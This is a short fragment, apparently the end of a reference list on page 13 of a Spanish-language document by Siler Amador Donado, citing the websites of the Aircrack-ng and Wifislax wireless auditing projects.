http://www.aircrack-ng.org/ 8. http://www.wifislax.org/

SILER AMADOR DONADO

Pgina 13